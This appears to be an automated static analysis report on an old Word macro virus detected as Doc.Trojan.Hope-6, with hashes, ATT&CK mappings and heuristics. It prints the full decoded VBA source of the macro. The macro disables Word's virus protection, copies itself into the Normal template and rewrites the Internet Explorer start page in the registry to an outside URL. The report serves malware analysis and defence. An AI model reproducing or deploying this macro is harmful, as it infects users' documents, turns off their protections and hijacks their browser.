Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0b91d77bb9e0730f…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 31.5 KB
Created: 1999-09-12 05:33:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 5d1125534a7ce333a34e8e9b8ff495f2
SHA-1: b80827051ea21f1e277004b35ba97ef607496b58
SHA-256: 0b91d77bb9e0730f4379068da7e7c07626118e3d057ca1b895c7ddd535cad2b5
Risk score: 122

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1547.001 Registry Run Keys / Startup Folder

The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The script modifies the Internet Explorer start page to 'http://altern.org/lyskovick', indicating a likely attempt to redirect the user to a malicious site. The presence of the 'Doc.Trojan.Hope-6' ClamAV detection further supports its malicious nature.

Heuristics (4)

  • ClamAV: Doc.Trojan.Hope-6 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Hope-6
  • VBA macros detected (severity: medium; 1 related finding; rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • Document_Open macro (severity: high; rule: OLE_VBA_DOCOPEN)
    Document contains a Document_Open macro
  • Embedded URL (severity: info; rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://altern.org/lyskovick (channel: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                               Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)  995 bytes
SHA-256: 20c330c20f362526f9cdb15a7f275af98699b25475487d900e2f2b9d541f61cc

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Options.VirusProtection = 0: Options.SaveNormalPrompt = 0: Options.ConfirmConversions = 0
If ThisDocument = NormalTemplate Then Set TI = ActiveDocument Else Set TI = NormalTemplate
VM = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
Set IR = TI.VBProject.VBComponents.Item(1).CodeModule
IR.DeleteLines 1, IR.CountOfLines: IR.AddFromString VM
If TI = ActiveDocument Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main", "Start Page") = "http://altern.org/lyskovick"
End Sub 'Schönheiten Von Lys Kovick... Für Mein Engel!